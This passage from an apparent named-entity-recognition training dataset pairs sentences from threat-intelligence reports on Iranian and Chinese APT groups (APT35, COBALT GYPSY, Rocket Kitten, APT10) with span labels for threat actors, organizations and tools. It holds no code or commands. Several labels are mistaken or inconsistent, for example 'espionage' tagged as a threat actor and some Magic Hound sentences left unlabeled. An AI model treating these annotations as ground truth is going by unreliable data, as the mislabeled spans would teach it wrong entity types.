and the Middle East .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "ORGANIZATION: telecommunications sectors": [[116, 142]]}, "info": {"id": "dnrti_train_000831", "source": "dnrti_train"}} {"text": "APT35 has historically used unsophisticated tools like those listed below in Figure 3 .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "TOOL: unsophisticated tools": [[28, 49]]}, "info": {"id": "dnrti_train_000832", "source": "dnrti_train"}} {"text": "APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "ORGANIZATION: military": [[52, 60]], "ORGANIZATION: diplomatic": [[63, 73]], "ORGANIZATION: government personnel": [[78, 98]], "ORGANIZATION: defense industrial base": [[141, 164]], "ORGANIZATION: DIB": [[167, 170]], "ORGANIZATION: telecommunications sectors": [[215, 241]]}, "info": {"id": "dnrti_train_000833", "source": "dnrti_train"}} {"text": "Many of the fake personas utilized by APT35 claimed to be part of news organizations , which led to APT35 being referred to as the Newscaster Team .", "spans": {"THREAT_ACTOR: APT35": [[38, 43], [100, 105]], "ORGANIZATION: news organizations": [[66, 84]], "THREAT_ACTOR: Newscaster Team": [[131, 146]]}, "info": {"id": "dnrti_train_000834", "source": "dnrti_train"}} {"text": "Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": {"THREAT_ACTOR: threat group": [[34, 46]], "ORGANIZATION: FireEye": [[52, 59]], "THREAT_ACTOR: APT33": [[70, 75]], "ORGANIZATION: petrochemical organizations": [[172, 199]]}, "info": {"id": "dnrti_train_000835", "source": "dnrti_train"}} {"text": "Since at least 2013 , the Iranian threat group FireEye tracks as APT33 
has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": {"THREAT_ACTOR: threat group": [[34, 46]], "ORGANIZATION: FireEye": [[47, 54]], "THREAT_ACTOR: APT33": [[65, 70]], "ORGANIZATION: petrochemical organizations": [[167, 194]]}, "info": {"id": "dnrti_train_000836", "source": "dnrti_train"}} {"text": "In early 2017 , Mandiant responded to an incident involving APT35 targeting an energy company .", "spans": {"ORGANIZATION: Mandiant": [[16, 24]], "THREAT_ACTOR: APT35": [[60, 65]], "ORGANIZATION: energy company": [[79, 93]]}, "info": {"id": "dnrti_train_000837", "source": "dnrti_train"}} {"text": "The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]]}, "info": {"id": "dnrti_train_000838", "source": "dnrti_train"}} {"text": "APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "TOOL: custom backdoor": [[35, 50]]}, "info": {"id": "dnrti_train_000839", "source": "dnrti_train"}} {"text": "They then proceeded to log directly into the VPN using the credentials of the compromised user .", "spans": {"TOOL: credentials of the compromised user": [[59, 94]]}, "info": {"id": "dnrti_train_000840", "source": "dnrti_train"}} {"text": "The resume contained the PupyRAT backdoor , which communicated with known APT35 infrastructure .", "spans": {"TOOL: PupyRAT backdoor": [[25, 41]], "THREAT_ACTOR: APT35": [[74, 79]]}, "info": {"id": "dnrti_train_000841", "source": "dnrti_train"}} {"text": "Once connected to the VPN , APT35 focused on stealing domain credentials from a Microsoft Active Directory Domain Controller to allow them to authenticate to the single-factor VPN and Office 365 instance .", "spans": {"THREAT_ACTOR: APT35": [[28, 33]]}, "info": {"id": "dnrti_train_000842", "source": 
"dnrti_train"}} {"text": "While having access to the organization 's environment , the Magic Hound targeted data related to entities in the Middle East .", "spans": {}, "info": {"id": "dnrti_train_000843", "source": "dnrti_train"}} {"text": "Mandiant has previously observed targeted attackers stealing email , but few threat actors have been as successful at this as APT35 .", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: attackers": [[42, 51]], "THREAT_ACTOR: threat actors": [[77, 90]], "THREAT_ACTOR: APT35": [[126, 131]]}, "info": {"id": "dnrti_train_000844", "source": "dnrti_train"}} {"text": "The campaigns delivered PupyRAT , an open-source cross-platform remote access trojan ( RAT ) .", "spans": {"TOOL: PupyRAT": [[24, 31]], "TOOL: remote access trojan": [[64, 84]], "TOOL: RAT": [[87, 90]]}, "info": {"id": "dnrti_train_000845", "source": "dnrti_train"}} {"text": "Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks .", "spans": {"THREAT_ACTOR: APT35": [[13, 18]]}, "info": {"id": "dnrti_train_000846", "source": "dnrti_train"}} {"text": "CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: threat actor": [[150, 162]], "THREAT_ACTOR: Mia Ash": [[178, 185]]}, "info": {"id": "dnrti_train_000847", "source": "dnrti_train"}} {"text": "Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims .", "spans": {}, "info": {"id": "dnrti_train_000848", "source": "dnrti_train"}} {"text": "COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or 
affiliated with the MENA region , identifying individual victims through social media sites .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[0, 12]], "ORGANIZATION: financial services organizations": [[100, 132]], "ORGANIZATION: individual victims": [[191, 209]]}, "info": {"id": "dnrti_train_000849", "source": "dnrti_train"}} {"text": "The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016 .", "spans": {"THREAT_ACTOR: threat actor": [[60, 72]]}, "info": {"id": "dnrti_train_000850", "source": "dnrti_train"}} {"text": "Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations .", "spans": {"ORGANIZATION: CTU": [[50, 53]]}, "info": {"id": "dnrti_train_000851", "source": "dnrti_train"}} {"text": "The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks .", "spans": {"TOOL: PowerShell command": [[16, 34]], "TOOL: PupyRAT": [[103, 110]], "TOOL: research and penetration-testing tool": [[115, 152]]}, "info": {"id": "dnrti_train_000852", "source": "dnrti_train"}} {"text": "The survey contained macros that , once enabled , downloaded PupyRAT .", "spans": {"TOOL: PupyRAT": [[61, 68]]}, "info": {"id": "dnrti_train_000853", "source": "dnrti_train"}} {"text": "CTU researchers determined that the COBALT GYPSY threat group orchestrated this activity due to the tools , techniques , and procedures ( TTPs ) used in both campaigns .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: COBALT GYPSY": [[36, 48]], "THREAT_ACTOR: threat group": [[49, 61]]}, "info": {"id": "dnrti_train_000854", "source": "dnrti_train"}} {"text": "The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": {"ORGANIZATION: 
employees": [[79, 88]]}, "info": {"id": "dnrti_train_000855", "source": "dnrti_train"}} {"text": "By compromising a user account that has administrative or elevated access , Magic Hound can quickly access a targeted environment to achieve their objectives .", "spans": {}, "info": {"id": "dnrti_train_000857", "source": "dnrti_train"}} {"text": "These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[35, 47]], "THREAT_ACTOR: Mia Ash": [[125, 132]]}, "info": {"id": "dnrti_train_000858", "source": "dnrti_train"}} {"text": "CTU researchers have observed multiple COBALT GYPSY campaigns since 2015 and consider it highly likely that the group is associated with Iranian government-directed cyber operations .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: group": [[112, 117]]}, "info": {"id": "dnrti_train_000859", "source": "dnrti_train"}} {"text": "The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets .", "spans": {"TOOL: Mia Ash": [[15, 22]], "THREAT_ACTOR: threat actors": [[80, 93]]}, "info": {"id": "dnrti_train_000860", "source": "dnrti_train"}} {"text": "SecureWorks Counter Threat Unit ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": {"ORGANIZATION: SecureWorks Counter Threat Unit": [[0, 31]], "ORGANIZATION: CTU": [[34, 37]], "ORGANIZATION: organization": [[112, 124]]}, "info": {"id": "dnrti_train_000864", "source": "dnrti_train"}} {"text": "SecureWorks® Counter Threat Unit™ ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit™": [[0, 33]], "ORGANIZATION: CTU": [[36, 39]], "ORGANIZATION: organization": [[114, 126]]}, "info": {"id": "dnrti_train_000865", "source": 
"dnrti_train"}} {"text": "CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY threat group ( formerly labeled Threat Group-2889 ) .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: threat actors": [[58, 71]], "THREAT_ACTOR: COBALT GYPSY": [[120, 132]], "THREAT_ACTOR: threat group": [[133, 145]], "THREAT_ACTOR: Threat Group-2889": [[165, 182]]}, "info": {"id": "dnrti_train_000866", "source": "dnrti_train"}} {"text": "Since early 2014 , an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection , supported by persistent spear phishing campaigns .", "spans": {"THREAT_ACTOR: attacker group": [[22, 36]]}, "info": {"id": "dnrti_train_000867", "source": "dnrti_train"}} {"text": "This cyber-espionage group was dubbed ' Rocket Kitten ' , and remains active as of this writing , with reported attacks as recent as October 2015 .", "spans": {"THREAT_ACTOR: cyber-espionage group": [[5, 26]], "THREAT_ACTOR: Rocket Kitten": [[40, 53]]}, "info": {"id": "dnrti_train_000868", "source": "dnrti_train"}} {"text": "Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East ( including targets inside Iran itself ) , as well as across Europe and in the United States .", "spans": {"TOOL: unsophisticated technical merit": [[28, 59]]}, "info": {"id": "dnrti_train_000869", "source": "dnrti_train"}} {"text": "The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"THREAT_ACTOR: hacking group": [[74, 87]], "THREAT_ACTOR: Ajax Security": [[105, 118]], "THREAT_ACTOR: Flying Kitten": [[136, 
149]], "ORGANIZATION: CrowdStrike": [[155, 166]], "ORGANIZATION: dissidents": [[221, 231]]}, "info": {"id": "dnrti_train_000870", "source": "dnrti_train"}} {"text": "An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"THREAT_ACTOR: hacking group": [[11, 24]], "THREAT_ACTOR: Ajax Security": [[40, 53]], "THREAT_ACTOR: Flying Kitten": [[69, 82]], "ORGANIZATION: CrowdStrike": [[88, 99]], "ORGANIZATION: dissidents": [[154, 164]]}, "info": {"id": "dnrti_train_000871", "source": "dnrti_train"}} {"text": "ClearSky 's September 2014 blog post first described active attacks using a piece of malware they dubbed ' Gholee ' ( as appears in a malicious payload export function , potentially named after a popular Iranian singer9 ) .", "spans": {"ORGANIZATION: ClearSky": [[0, 8]], "TOOL: Gholee": [[107, 113]]}, "info": {"id": "dnrti_train_000873", "source": "dnrti_train"}} {"text": "The Rocket Kitten attacker group 's main attack vector is spear-phishing .", "spans": {"THREAT_ACTOR: Rocket Kitten": [[4, 17]], "THREAT_ACTOR: attacker group": [[18, 32]]}, "info": {"id": "dnrti_train_000874", "source": "dnrti_train"}} {"text": "After learning of an active attack incident from the Rocket Kitten group on a customer network , Check Point researchers decided to actively join the investigation .", "spans": {"THREAT_ACTOR: Rocket Kitten group": [[53, 72]], "ORGANIZATION: Check Point": [[97, 108]]}, "info": {"id": "dnrti_train_000875", "source": "dnrti_train"}} {"text": "As described in previous publications , the Rocket Kitten attackers make extensive use of various phishing schemes .", "spans": {"THREAT_ACTOR: Rocket Kitten": [[44, 57]], "THREAT_ACTOR: attackers": [[58, 67]]}, "info": {"id": "dnrti_train_000876", "source": "dnrti_train"}} {"text": "While the recent paper from Trend Micro and ClearSky 
( ' The Spy Kittens Are Back : Rocket Kitten 2 ' ) does extensively cover the campaign 's narrative , we aimed to seek confirmation that our analyzed attack was positively connected to the same campaign and set out to provide additional value and insight .", "spans": {"ORGANIZATION: Trend Micro": [[28, 39]], "ORGANIZATION: ClearSky": [[44, 52]], "THREAT_ACTOR: Spy Kittens": [[61, 72]], "THREAT_ACTOR: Rocket Kitten": [[84, 97]]}, "info": {"id": "dnrti_train_000877", "source": "dnrti_train"}} {"text": "As the Rocket Kitten group 's behavior was well characterized in previous publications ( see the recent report from Trend Micro and ClearSky ) .", "spans": {"THREAT_ACTOR: Rocket Kitten group": [[7, 26]], "ORGANIZATION: Trend Micro": [[116, 127]], "ORGANIZATION: ClearSky": [[132, 140]]}, "info": {"id": "dnrti_train_000878", "source": "dnrti_train"}} {"text": "Magic Hound will often find simpler ways for effective compromise , such as creative phishing and simple custom malware .", "spans": {}, "info": {"id": "dnrti_train_000879", "source": "dnrti_train"}} {"text": "We present the connection between Behzad Mesri , an Iranian national recently indicted for his involvement in hacking HBO , and Charming Kitten .", "spans": {"THREAT_ACTOR: Behzad Mesri": [[34, 46]], "THREAT_ACTOR: Charming Kitten": [[128, 143]]}, "info": {"id": "dnrti_train_000880", "source": "dnrti_train"}} {"text": "Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 .", "spans": {"THREAT_ACTOR: threat groups": [[212, 225]], "THREAT_ACTOR: Oilrig1": [[236, 243]], "THREAT_ACTOR: CopyKittens2": [[248, 260]]}, "info": {"id": "dnrti_train_000881", "source": "dnrti_train"}} {"text": "A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report - \" Flying 
Kitten to Rocket Kitten , A Case of Ambiguity and Shared Code \" 3 by Collin Anderson and Claudio Guarnieri .", "spans": {"THREAT_ACTOR: Flying Kitten": [[115, 128]], "THREAT_ACTOR: Rocket Kitten": [[132, 145]]}, "info": {"id": "dnrti_train_000882", "source": "dnrti_train"}} {"text": "FireEye 's publication of \" Operation Saffron Rose \" report , which described Flying Kitten 's operations against aviation firms , led to the dismantling of Flying Kitten 's infrastructure and the apparent end of its activities .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: Flying Kitten": [[78, 91], [157, 170]], "ORGANIZATION: aviation firms": [[114, 128]]}, "info": {"id": "dnrti_train_000883", "source": "dnrti_train"}} {"text": "To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's .", "spans": {"THREAT_ACTOR: hacker": [[20, 26]], "THREAT_ACTOR: Behzad Mesri": [[29, 41], [249, 261]], "THREAT_ACTOR: Turk Black Hat": [[57, 71]], "THREAT_ACTOR: ArYaIeIrAn": [[83, 93]], "TOOL: PersianDNS": [[157, 167]], "TOOL: Mahanserver": [[170, 181]], "ORGANIZATION: Facebook": [[230, 238]]}, "info": {"id": "dnrti_train_000884", "source": "dnrti_train"}} {"text": "Charming kitten regularly target international media outlets with Persian-language services .", "spans": {"THREAT_ACTOR: Charming kitten": [[0, 15]]}, "info": {"id": "dnrti_train_000885", "source": "dnrti_train"}} {"text": "It was a decoy to make visitor download a \" Flash Player \" , which was in fact DownPaper malware , analyzed later in this report .", "spans": {"TOOL: DownPaper malware": [[79, 96]]}, "info": {"id": "dnrti_train_000886", "source": "dnrti_train"}} {"text": "In addition to using PlugX and Poison Ivy ( PIVY ) , both known to be used by the group , they also used a new Trojan called \" ChChes \" by 
the Japan Computer Emergency Response Team Coordination Center ( JPCERT ) .", "spans": {"TOOL: PlugX": [[21, 26]], "TOOL: Poison Ivy": [[31, 41]], "TOOL: PIVY": [[44, 48]], "THREAT_ACTOR: group": [[82, 87]], "TOOL: ChChes": [[127, 133]], "ORGANIZATION: Japan Computer Emergency Response Team Coordination Center": [[143, 201]], "ORGANIZATION: JPCERT": [[204, 210]]}, "info": {"id": "dnrti_train_000887", "source": "dnrti_train"}} {"text": "Wapack labs also observed a similar sample targeting Japan in November .", "spans": {"ORGANIZATION: Wapack": [[0, 6]]}, "info": {"id": "dnrti_train_000888", "source": "dnrti_train"}} {"text": "MenuPass spoofed several sender email addresses to send spear phishing emails , most notably public addresses associated with the Sasakawa Peace Foundation and The White House .", "spans": {"THREAT_ACTOR: MenuPass": [[0, 8]], "ORGANIZATION: Sasakawa Peace Foundation": [[130, 155]], "ORGANIZATION: White House": [[164, 175]]}, "info": {"id": "dnrti_train_000889", "source": "dnrti_train"}} {"text": "menuPass typically makes use of a mix of DDNS and actor-registered domains in their attack campaigns .", "spans": {"TOOL: DDNS and actor-registered domains": [[41, 74]]}, "info": {"id": "dnrti_train_000890", "source": "dnrti_train"}} {"text": "There is not much public information about the APT campaign called menuPass ( also known as Stone Panda and APT10 ) .", "spans": {"THREAT_ACTOR: menuPass": [[67, 75]], "THREAT_ACTOR: Stone Panda": [[92, 103]], "THREAT_ACTOR: APT10": [[108, 113]]}, "info": {"id": "dnrti_train_000891", "source": "dnrti_train"}} {"text": "A paper from FireEye in 2013 on several campaigns using PIVY included menuPass as one of them .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "TOOL: PIVY": [[56, 60]]}, "info": {"id": "dnrti_train_000892", "source": "dnrti_train"}} {"text": "Believed to have started activity in 2009 and to originate from China , the group initially was known for targeting US and overseas defense contractors but 
broadened their targeting as time passed .", "spans": {"THREAT_ACTOR: group": [[76, 81]], "ORGANIZATION: defense contractors": [[132, 151]]}, "info": {"id": "dnrti_train_000893", "source": "dnrti_train"}} {"text": "menuPass has targeted individuals and organizations in Japan since at least 2014 , and as the same organizations and academics were largely targeted each month in these attacks , it further shows menuPass is persistent in attempts to compromise their targets .", "spans": {}, "info": {"id": "dnrti_train_000894", "source": "dnrti_train"}} {"text": "menuPass also heavily favors spear phishing , and so takes steps to socially engineer their spear phishes for maximum appearance of legitimacy .", "spans": {}, "info": {"id": "dnrti_train_000895", "source": "dnrti_train"}} {"text": "menuPass is an ongoing APT campaign with a broad range of targets and will likely continue to target Japan in the future .", "spans": {}, "info": {"id": "dnrti_train_000896", "source": "dnrti_train"}} {"text": "ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints .", "spans": {"MALWARE: ChopShop1": [[0, 9]], "ORGANIZATION: MITRE Corporation": [[46, 63]]}, "info": {"id": "dnrti_train_000897", "source": "dnrti_train"}} {"text": "PyCommands , meanwhile , are Python scripts that automate tasks for Immunity Debugger , a popular tool for reverse-engineering malware binaries .", "spans": {"TOOL: Immunity Debugger": [[68, 85]]}, "info": {"id": "dnrti_train_000898", "source": "dnrti_train"}} {"text": "Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com .", "spans": {"TOOL: Poison Ivy": [[0, 10]]}, "info": {"id": "dnrti_train_000899", "source": "dnrti_train"}} {"text": "First released in 2005 , the tool has gone unchanged since 2008 with v ersion 2.3.2 .", "spans": 
{}, "info": {"id": "dnrti_train_000900", "source": "dnrti_train"}} {"text": "Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying .", "spans": {"TOOL: Poison Ivy": [[0, 10]], "TOOL: RATs": [[58, 62]]}, "info": {"id": "dnrti_train_000901", "source": "dnrti_train"}} {"text": "APT40 was previously reported as TEMP.Periscope and TEMP.Jumper .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]], "THREAT_ACTOR: TEMP.Periscope": [[33, 47]], "THREAT_ACTOR: TEMP.Jumper": [[52, 63]]}, "info": {"id": "dnrti_train_000902", "source": "dnrti_train"}} {"text": "They move laterally and escalate system privileges to extract sensitive information — whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult .", "spans": {"THREAT_ACTOR: attacker": [[99, 107]], "TOOL: RATs": [[141, 145]]}, "info": {"id": "dnrti_train_000903", "source": "dnrti_train"}} {"text": "In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system .", "spans": {"TOOL: PIVY": [[55, 59]], "THREAT_ACTOR: attackers": [[62, 71]], "TOOL: RAT": [[81, 84]], "ORGANIZATION: security firm RSA": [[99, 116]]}, "info": {"id": "dnrti_train_000904", "source": "dnrti_train"}} {"text": "Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. 
government website and a variety of others .", "spans": {"TOOL: PIVY": [[16, 20]], "VULNERABILITY: zero-day exploit": [[42, 58]]}, "info": {"id": "dnrti_train_000906", "source": "dnrti_train"}} {"text": "The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering .", "spans": {"TOOL: Poison Ivy": [[4, 14]], "THREAT_ACTOR: attackers": [[34, 43]]}, "info": {"id": "dnrti_train_000907", "source": "dnrti_train"}} {"text": "Attackers can point and click their way through a compromised network and exfiltrate data .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "dnrti_train_000908", "source": "dnrti_train"}} {"text": "Commodity RATs also complicate efforts by security professionals to correlate a threat actor 's activity over time—attackers can hide in the sea of malicious activity that also uses Poison Ivy-based malware .", "spans": {"TOOL: RATs": [[10, 14]], "THREAT_ACTOR: threat actor": [[80, 92]], "TOOL: Poison Ivy-based malware": [[182, 206]]}, "info": {"id": "dnrti_train_000909", "source": "dnrti_train"}} {"text": "This report is an initial public release of research PwC UK and BAE Systems have conducted into new , sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan .", "spans": {"ORGANIZATION: PwC UK": [[53, 59]], "ORGANIZATION: BAE Systems": [[64, 75]], "THREAT_ACTOR: threat actor": [[147, 159]], "ORGANIZATION: managed IT service providers": [[168, 196]]}, "info": {"id": "dnrti_train_000910", "source": "dnrti_train"}} {"text": "Since late 2016 , PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by APT10 .", "spans": {"ORGANIZATION: PwC UK": [[18, 24]], "ORGANIZATION: BAE Systems": [[29, 40]], "THREAT_ACTOR: APT10": [[116, 121]]}, "info": {"id": 
"dnrti_train_000911", "source": "dnrti_train"}} {"text": "The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally .", "spans": {"ORGANIZATION: managed IT service providers": [[74, 102]], "ORGANIZATION: MSPs": [[105, 109], [217, 221]], "THREAT_ACTOR: APT10": [[123, 128]]}, "info": {"id": "dnrti_train_000912", "source": "dnrti_train"}} {"text": "APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report , which comprehensively detailed the malware 's functionality and features , and its use by several China-based threat actors , including APT10 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5], [220, 225]], "TOOL: Poison Ivy malware family": [[28, 53]], "ORGANIZATION: FireEye": [[67, 74]], "THREAT_ACTOR: threat actors": [[194, 207]]}, "info": {"id": "dnrti_train_000913", "source": "dnrti_train"}} {"text": "APT10 primarily used PlugX malware from 2014 to 2016 , progressively improving and deploying newer versions , while simultaneously standardising their command and control function .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: PlugX malware": [[21, 34]]}, "info": {"id": "dnrti_train_000914", "source": "dnrti_train"}} {"text": "PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection .", "spans": {"ORGANIZATION: PwC UK": [[0, 6]], "ORGANIZATION: BAE Systems": [[11, 22]], "THREAT_ACTOR: APT10": [[55, 60]], "THREAT_ACTOR: threat actor": [[78, 90]], "THREAT_ACTOR: espionage": [[107, 116]]}, "info": {"id": "dnrti_train_000915", "source": "dnrti_train"}} {"text": "APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world 
.", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: MSP networks": [[104, 116]], "ORGANIZATION: customers": [[138, 147]]}, "info": {"id": "dnrti_train_000916", "source": "dnrti_train"}} {"text": "APT10 , a name originally coined by FireEye , is also referred to as Red Apollo by PwC UK , CVNX by BAE Systems , Stone Panda by CrowdStrike , and menuPass Team more broadly in the public domain .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "ORGANIZATION: FireEye": [[36, 43]], "THREAT_ACTOR: Red Apollo": [[69, 79]], "ORGANIZATION: PwC UK": [[83, 89]], "THREAT_ACTOR: CVNX": [[92, 96]], "ORGANIZATION: BAE Systems": [[100, 111]], "THREAT_ACTOR: Stone Panda": [[114, 125]], "ORGANIZATION: CrowdStrike": [[129, 140]], "THREAT_ACTOR: menuPass Team": [[147, 160]]}, "info": {"id": "dnrti_train_000917", "source": "dnrti_train"}} {"text": "The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro3 similarly detailing the use of EvilGrab malware .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16], [160, 172]], "ORGANIZATION: FireEye": [[122, 129]], "TOOL: Poison Ivy malware family": [[187, 212]], "ORGANIZATION: Trend Micro3": [[231, 243]], "TOOL: EvilGrab malware": [[275, 291]]}, "info": {"id": "dnrti_train_000918", "source": "dnrti_train"}} {"text": "The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro similarly detailing the use of EvilGrab malware .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16], [160, 172]], "ORGANIZATION: FireEye": [[122, 129]], "TOOL: Poison Ivy malware family": [[187, 212]], "ORGANIZATION: Trend Micro": [[231, 242]], "TOOL: EvilGrab malware": [[274, 290]]}, "info": {"id": 
"dnrti_train_000919", "source": "dnrti_train"}} {"text": "APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB )1 and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "ORGANIZATION: technology": [[151, 161]], "ORGANIZATION: telecommunications sector": [[166, 191]], "ORGANIZATION: MSPs": [[305, 309]]}, "info": {"id": "dnrti_train_000920", "source": "dnrti_train"}} {"text": "The research and ongoing tracking of APT10 by both PwC UK and BAE .", "spans": {"THREAT_ACTOR: APT10": [[37, 42]], "ORGANIZATION: PwC UK": [[51, 57]], "ORGANIZATION: BAE": [[62, 65]]}, "info": {"id": "dnrti_train_000921", "source": "dnrti_train"}} {"text": "APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "ORGANIZATION: technology": [[150, 160]], "ORGANIZATION: telecommunications sector": [[165, 190]], "ORGANIZATION: MSPs": [[304, 308]]}, "info": {"id": "dnrti_train_000922", "source": "dnrti_train"}} {"text": "PwC UK has been engaged in supporting investigations linked to APT10 compromises .", "spans": {"ORGANIZATION: PwC UK": [[0, 6]], "THREAT_ACTOR: APT10": [[63, 68]]}, "info": {"id": "dnrti_train_000923", "source": "dnrti_train"}} {"text": "As a result of our analysis of APT10 's activities , we believe that it almost certainly benefits from significant staffing and logistical resources , which have increased over the last three years , with a significant step-change in 2016 .", "spans": {"THREAT_ACTOR: APT10": [[31, 36]]}, "info": {"id": 
"dnrti_train_000924", "source": "dnrti_train"}} {"text": "Due to the scale of the threat actor 's operations throughout 2016 and 2017 , we similarly assess it currently comprises multiple teams , each responsible for a different section of the day-to-day operations , namely domain registration , infrastructure management , malware development , target operations , and analysis .", "spans": {"THREAT_ACTOR: threat actor": [[24, 36]]}, "info": {"id": "dnrti_train_000925", "source": "dnrti_train"}} {"text": "APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: Poison Ivy": [[43, 53]], "TOOL: PlugX": [[166, 171]]}, "info": {"id": "dnrti_train_000926", "source": "dnrti_train"}} {"text": "It is highly likely that this is due to the release of the 2013 FireEye report .", "spans": {"ORGANIZATION: FireEye": [[64, 71]]}, "info": {"id": "dnrti_train_000927", "source": "dnrti_train"}} {"text": "Our report will detail the most recent campaigns conducted by APT10 , including the sustained targeting of MSPs , which we have named Operation Cloud Hopper , and the targeting of a number of Japanese institutions .", "spans": {"THREAT_ACTOR: APT10": [[62, 67]], "ORGANIZATION: MSPs": [[107, 111]], "ORGANIZATION: institutions": [[201, 213]]}, "info": {"id": "dnrti_train_000928", "source": "dnrti_train"}} {"text": "MSPs therefore represent a high-payoff target for espionagefocused threat actors such as APT10 .", "spans": {"ORGANIZATION: MSPs": [[0, 4]], "THREAT_ACTOR: threat actors": [[67, 80]], "THREAT_ACTOR: APT10": [[89, 94]]}, "info": {"id": "dnrti_train_000929", "source": "dnrti_train"}} {"text": "Given the level of 